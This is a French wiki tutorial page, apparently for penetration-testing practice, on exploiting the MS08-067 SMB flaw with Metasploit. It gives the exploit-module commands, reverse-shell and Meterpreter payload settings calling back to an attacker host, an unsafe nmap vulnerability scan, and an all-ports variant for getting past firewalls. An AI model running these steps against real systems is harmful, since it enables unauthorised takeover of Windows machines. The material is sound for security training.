Ms08 067

De wiki.nexiat.fr
Aller à la navigation Aller à la recherche
Fiche express
Domaine Exploitation SMB
Module windows/smb/ms08_067_netapi
Contexte Metasploit
Voir aussi Msfconsole · Meterpreter

MS08-067 est une faille SMB ancienne mais encore fréquemment rencontrée. C'est un cas d'école de l'exploitation avec Metasploit.

Mise en place

use exploit/windows/smb/ms08_067_netapi
show options
set RHOST 192.168.0.61

Choix du payload

Une fois positionné dans l'exploit, on liste les payloads disponibles. Le payload shell/reverse_tcp nécessitera un sessions -u 1 pour être promu en meterpreter ; meterpreter/reverse_tcp le donne directement.

show payloads
set payload windows/shell/reverse_tcp
# ou directement
set payload windows/meterpreter/reverse_tcp
show options

Ce payload identifie parfois mal le système distant ; on peut forcer la cible pour éviter l'échec :

show targets
info
set target 3
set LHOST 192.168.0.19
set LPORT 8080
exploit

Validation par nmap

nmap -sT -A --script=smb-check-vulns --script-args=unsafe=1 -P0 192.168.0.61

Variante « tous les ports »

Un pare-feu coupe souvent les flux sortants mais pas nécessairement tous les ports entrants. Pour pallier un manque d'information :

search ports
set payload windows/meterpreter/reverse_tcp_allports
exploit -j
sessions -l
sessions -i 1

Voir aussi